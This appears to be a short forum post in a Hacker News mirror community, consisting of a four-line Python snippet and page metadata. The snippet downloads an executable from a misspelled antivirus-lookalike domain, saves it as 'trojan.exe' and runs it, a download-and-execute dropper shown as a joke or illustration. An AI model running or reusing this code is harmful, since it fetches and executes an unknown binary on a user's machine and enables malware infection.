import requests, os
with open("trojan.exe", "wb") as file:
file.write(requests.get("download.mcaffe.com/download.exe").content)
os.system("start trojan.exe")
this post was submitted on 14 Jun 2024
3 points (80.0% liked)
Hacker News
2171 readers
1 users here now
A mirror of Hacker News' best submissions.
founded 2 years ago
MODERATORS